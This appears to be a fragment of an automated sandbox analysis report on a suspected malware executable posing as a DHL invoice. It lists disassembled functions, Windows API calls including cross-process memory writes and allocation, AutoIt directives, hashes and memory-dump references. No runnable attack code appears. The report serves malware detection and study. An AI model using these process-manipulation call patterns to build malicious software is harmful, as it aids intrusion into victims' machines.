                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __freea$_free
                                                                                                                        • String ID: a/p$am/pm
                                                                                                                        • API String ID: 3432400110-3206640213
                                                                                                                        • Opcode ID: aff7bbb9f3c84de0c01fbc417cefb8f160a1ee63aae78cfa09716651790a1d71
                                                                                                                        • Instruction ID: ac3fc6f415ba77bcb67fda250c3576871ab36d4fc048c988165f79a1dedc038a
                                                                                                                        • Opcode Fuzzy Hash: aff7bbb9f3c84de0c01fbc417cefb8f160a1ee63aae78cfa09716651790a1d71
                                                                                                                        • Instruction Fuzzy Hash: 45D10339900206CACB2B9F68C855BFAB7B4FF06300F2DC159E9069BB58D3759D80CB91
                                                                                                                        Function 003B61D0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 324COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00350242: EnterCriticalSection.KERNEL32(0040070C,00401884,?,?,0034198B,00402518,?,?,?,003312F9,00000000), ref: 0035024D
                                                                                                                          • Part of subcall function 00350242: LeaveCriticalSection.KERNEL32(0040070C,?,0034198B,00402518,?,?,?,003312F9,00000000), ref: 0035028A
                                                                                                                          • Part of subcall function 003500A3: __onexit.LIBCMT ref: 003500A9
                                                                                                                        • __Init_thread_footer.LIBCMT ref: 003B6238
                                                                                                                          • Part of subcall function 003501F8: EnterCriticalSection.KERNEL32(0040070C,?,?,00348747,00402514), ref: 00350202
                                                                                                                          • Part of subcall function 003501F8: LeaveCriticalSection.KERNEL32(0040070C,?,00348747,00402514), ref: 00350235
                                                                                                                          • Part of subcall function 003A359C: LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 003A35E4
                                                                                                                          • Part of subcall function 003A359C: LoadStringW.USER32(00402390,?,00000FFF,?), ref: 003A360A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CriticalSection$EnterLeaveLoadString$Init_thread_footer__onexit
                                                                                                                        • String ID: x#@$x#@$x#@
                                                                                                                        • API String ID: 1072379062-2468959183
                                                                                                                        • Opcode ID: b3c5a518d3cae9d24f5fe6fb8790c14b986f1ab2a56afbd6222915c5dd61a770
                                                                                                                        • Instruction ID: df6b68be03d2e3ac3a4eee46a37992ed5722ace6b75ef8d3fab6bd6f5d8952ed
                                                                                                                        • Opcode Fuzzy Hash: b3c5a518d3cae9d24f5fe6fb8790c14b986f1ab2a56afbd6222915c5dd61a770
                                                                                                                        • Instruction Fuzzy Hash: 90C19071A00105AFDB26DF58C891EFEB7B9EF49304F11802AFA05AB692D774ED44CB90
                                                                                                                        Function 00368A61 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 124COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000002,00000000,?,?,?,00000000,?,?,?,?), ref: 00368B6E
                                                                                                                        • GetLastError.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,00000000,00001000,?), ref: 00368B7A
                                                                                                                        • __dosmaperr.LIBCMT ref: 00368B81
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharErrorLastMultiWide__dosmaperr
                                                                                                                        • String ID: .5
                                                                                                                        • API String ID: 2434981716-4279605997
                                                                                                                        • Opcode ID: 402a0d0688d3c158dc701cd06dad14a6e7f003127cde269439354ef8be1761f5
                                                                                                                        • Instruction ID: 5e70548a9316937d7a28264921870ad77b51c1bfeda0cebb3368f074f60b3547
                                                                                                                        • Opcode Fuzzy Hash: 402a0d0688d3c158dc701cd06dad14a6e7f003127cde269439354ef8be1761f5
                                                                                                                        • Instruction Fuzzy Hash: 7F41ACB0604045AFDB239F68C880AB93FAADF4D304F29C7A9F8849B546DE318C029794
                                                                                                                        Function 00392716 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0039B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,003921D0,?,?,00000034,00000800,?,00000034), ref: 0039B42D
                                                                                                                        • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00392760
                                                                                                                          • Part of subcall function 0039B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,003921FF,?,?,00000800,?,00001073,00000000,?,?), ref: 0039B3F8
                                                                                                                          • Part of subcall function 0039B32A: GetWindowThreadProcessId.USER32(?,?), ref: 0039B355
                                                                                                                          • Part of subcall function 0039B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00392194,00000034,?,?,00001004,00000000,00000000), ref: 0039B365
                                                                                                                          • Part of subcall function 0039B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00392194,00000034,?,?,00001004,00000000,00000000), ref: 0039B37B
                                                                                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 003927CD
                                                                                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0039281A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                        • String ID: @
                                                                                                                        • API String ID: 4150878124-2766056989
                                                                                                                        • Opcode ID: a0442feec99f3f3b1edf5e39ea79fb409f6be6ac1a0ce769fd78c2a38367db28
                                                                                                                        • Instruction ID: 7aff7f628fe8d37d735bfad4391065f33ac8b6b1b30bc84e8cc53f73a63405f5
                                                                                                                        • Opcode Fuzzy Hash: a0442feec99f3f3b1edf5e39ea79fb409f6be6ac1a0ce769fd78c2a38367db28
                                                                                                                        • Instruction Fuzzy Hash: 1A411976900218BFDF11DBA4DD85EEEBBB8AF09700F104099FA55BB181DB706E45CBA1
                                                                                                                        Function 0036172E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe,00000104), ref: 00361769
                                                                                                                        • _free.LIBCMT ref: 00361834
                                                                                                                        • _free.LIBCMT ref: 0036183E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _free$FileModuleName
                                                                                                                        • String ID: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe
                                                                                                                        • API String ID: 2506810119-911722430
                                                                                                                        • Opcode ID: 159f272cd527022671e5e495871a60463cfd350944dad346f3c5ea2c8e839bdc
                                                                                                                        • Instruction ID: c317a8b2fc711ad3273c61253e9826ea5b29ea32b00640d5d325b23abcc850fd
                                                                                                                        • Opcode Fuzzy Hash: 159f272cd527022671e5e495871a60463cfd350944dad346f3c5ea2c8e839bdc
                                                                                                                        • Instruction Fuzzy Hash: 57316275A00218AFDB22DF99D885D9EBBFCEB85310F1981AAF804EB215D7705E40DB94
                                                                                                                        Function 003C4416 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,003CCC08,00000000,?,?,?,?), ref: 003C44AA
                                                                                                                        • GetWindowLongW.USER32 ref: 003C44C7
                                                                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 003C44D7
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Window$Long
                                                                                                                        • String ID: SysTreeView32
                                                                                                                        • API String ID: 847901565-1698111956
                                                                                                                        • Opcode ID: 12c1191efdf9e1eee3a55adff5cc993c91925e73c5cfdcea5afa82250c9191e3
                                                                                                                        • Instruction ID: f6367b859199bf80929edfaf55b922dadda588c3dae33a05f67c332d0c13406f
                                                                                                                        • Opcode Fuzzy Hash: 12c1191efdf9e1eee3a55adff5cc993c91925e73c5cfdcea5afa82250c9191e3
                                                                                                                        • Instruction Fuzzy Hash: 4B319C31210605AFDB269E38DC45FEA7BA9EB09334F214319F979D21E0DB70EC509750
                                                                                                                        Function 003C4537 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 95windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 003C461F
                                                                                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 003C4634
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend
                                                                                                                        • String ID: '$xV
                                                                                                                        • API String ID: 3850602802-1488752359
                                                                                                                        • Opcode ID: b3fdd9dbdf9bd3fcc9df18c858fb1b2cae54f3371888b0c0e841733c03f015f1
                                                                                                                        • Instruction ID: dddf9b455e1026c7b5cf68a53eea927bd23222a3fff046d2d862bad0a600bf5f
                                                                                                                        • Opcode Fuzzy Hash: b3fdd9dbdf9bd3fcc9df18c858fb1b2cae54f3371888b0c0e841733c03f015f1
                                                                                                                        • Instruction Fuzzy Hash: 62311774A002099FDB15CF69C990FDABBB5FB49300F14406AE904EB351D770AD51CF90
                                                                                                                        Function 00396E71 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92memoryCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SysReAllocString.OLEAUT32(?,?), ref: 00396EED
                                                                                                                        • VariantCopyInd.OLEAUT32(?,?), ref: 00396F08
                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00396F12
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Variant$AllocClearCopyString
                                                                                                                        • String ID: *j9
                                                                                                                        • API String ID: 2173805711-176951553
                                                                                                                        • Opcode ID: 315bd389031dfa11f3dec907a98e481934f60fd4baac8bf3d61a33e8bd8c563f
                                                                                                                        • Instruction ID: b705bf688e54ef7a59d5206405f44eb6e8233ac1f4022b5bf0502d312d95d3a5
                                                                                                                        • Opcode Fuzzy Hash: 315bd389031dfa11f3dec907a98e481934f60fd4baac8bf3d61a33e8bd8c563f
                                                                                                                        • Instruction Fuzzy Hash: 7C319172605245DFCF0BAFA4E8929BE77B9EF85300F101499F9038F2A1C7349926DB90
                                                                                                                        Function 003B304E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 003B335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,003B3077,?,?), ref: 003B3378
                                                                                                                        • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 003B307A
                                                                                                                        • _wcslen.LIBCMT ref: 003B309B
                                                                                                                        • htons.WSOCK32(00000000,?,?,00000000), ref: 003B3106
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                                                                                        • String ID: 255.255.255.255
                                                                                                                        • API String ID: 946324512-2422070025
                                                                                                                        • Opcode ID: 6c2f71c9510aae49f6c3d38aaa2a82d38e2e133de297ee3aee945aadb3528b4c
                                                                                                                        • Instruction ID: b63b7ab4c1a28d079f260f7bd3f77169783fbd3594a0f15045c1865112225825
                                                                                                                        • Opcode Fuzzy Hash: 6c2f71c9510aae49f6c3d38aaa2a82d38e2e133de297ee3aee945aadb3528b4c
                                                                                                                        • Instruction Fuzzy Hash: F43104396042159FC712EF28C881EAA77E4EF1431CF258059EA168FB92CB32EE41C760
                                                                                                                        Function 003995AD Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 85COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcslen
                                                                                                                        • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                                        • API String ID: 176396367-2734436370
                                                                                                                        • Opcode ID: 900cd606f0d222816a7471ca43508eed7c0678dabb24e44b018d7f4a5a09c656
                                                                                                                        • Instruction ID: 852d1bb2330312b9ce79dd4fe663ebd2cdac7eede3c81f5f8a4493415198c018
                                                                                                                        • Opcode Fuzzy Hash: 900cd606f0d222816a7471ca43508eed7c0678dabb24e44b018d7f4a5a09c656
                                                                                                                        • Instruction Fuzzy Hash: 3521F67210451166DB33AB2C9802FB7B3AC9F52320F15402FF9499B151EB51AD85C3D5
                                                                                                                        Function 003C37B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 003C3840
                                                                                                                        • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 003C3850
                                                                                                                        • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 003C3876
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$MoveWindow
                                                                                                                        • String ID: Listbox
                                                                                                                        • API String ID: 3315199576-2633736733
                                                                                                                        • Opcode ID: 47636599bfc923a6812072b30dcd3a8048a68eebf535438b6c4eea88ff466787
                                                                                                                        • Instruction ID: 8a3823e25108a6dbbafb5654e828ce25abd8c37d4597314c1dcd2c4729c8d8ee
                                                                                                                        • Opcode Fuzzy Hash: 47636599bfc923a6812072b30dcd3a8048a68eebf535438b6c4eea88ff466787
                                                                                                                        • Instruction Fuzzy Hash: 4C218E72610218BFEB229F54DC85FBB376EEF89750F118128F9049B190C671ED528BA0
                                                                                                                        Function 003A49F4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 003A4A08
                                                                                                                        • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 003A4A5C
                                                                                                                        • SetErrorMode.KERNEL32(00000000,?,?,003CCC08), ref: 003A4AD0
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorMode$InformationVolume
                                                                                                                        • String ID: %lu
                                                                                                                        • API String ID: 2507767853-685833217
                                                                                                                        • Opcode ID: 442bf6131a261830d78864a5cc21ae1deda71ffeae45cd81c68b8e6860ef647d
                                                                                                                        • Instruction ID: db089c2daffb25a214d453c92d172efc047f42ec9a907c047d542da516fe3a89
                                                                                                                        • Opcode Fuzzy Hash: 442bf6131a261830d78864a5cc21ae1deda71ffeae45cd81c68b8e6860ef647d
                                                                                                                        • Instruction Fuzzy Hash: 33317171A00108AFDB12DF54C885EAA7BF8EF49308F1480A9F909DF252D771ED45CB61
                                                                                                                        Function 003C41EB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 003C424F
                                                                                                                        • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 003C4264
                                                                                                                        • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 003C4271
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend
                                                                                                                        • String ID: msctls_trackbar32
                                                                                                                        • API String ID: 3850602802-1010561917
                                                                                                                        • Opcode ID: 8fd18ca818e6ac25a93e15cd30182bcf49390dadbded13a5bcf79cb878ce14f2
                                                                                                                        • Instruction ID: c213343a34dd9f69a11cfb9ef99fd57bf5c7732f0140e35560399df522dae9a6
                                                                                                                        • Opcode Fuzzy Hash: 8fd18ca818e6ac25a93e15cd30182bcf49390dadbded13a5bcf79cb878ce14f2
                                                                                                                        • Instruction Fuzzy Hash: 87110632240208BEEF225F28CC46FAB7BACEF95B54F020528FA55E60A0D271DC619B10
                                                                                                                        Function 00392F52 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00336B57: _wcslen.LIBCMT ref: 00336B6A
                                                                                                                          • Part of subcall function 00392DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00392DC5
                                                                                                                          • Part of subcall function 00392DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00392DD6
                                                                                                                          • Part of subcall function 00392DA7: GetCurrentThreadId.KERNEL32 ref: 00392DDD
                                                                                                                          • Part of subcall function 00392DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00392DE4
                                                                                                                        • GetFocus.USER32 ref: 00392F78
                                                                                                                          • Part of subcall function 00392DEE: GetParent.USER32(00000000), ref: 00392DF9
                                                                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 00392FC3
                                                                                                                        • EnumChildWindows.USER32(?,0039303B), ref: 00392FEB
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2052860859.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2052842332.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2052947768.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053015511.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2053042056.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_330000_DHL DOC INV 191224.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                                                                                        • String ID: %s%d
                                                                                                                        • API String ID: 1272988791-1110647743
                                                                                                                        • Opcode ID: 0f1749d1a5c5d3131b9833cd770872354c3de9b9966bf75907c0d63dbff41b99
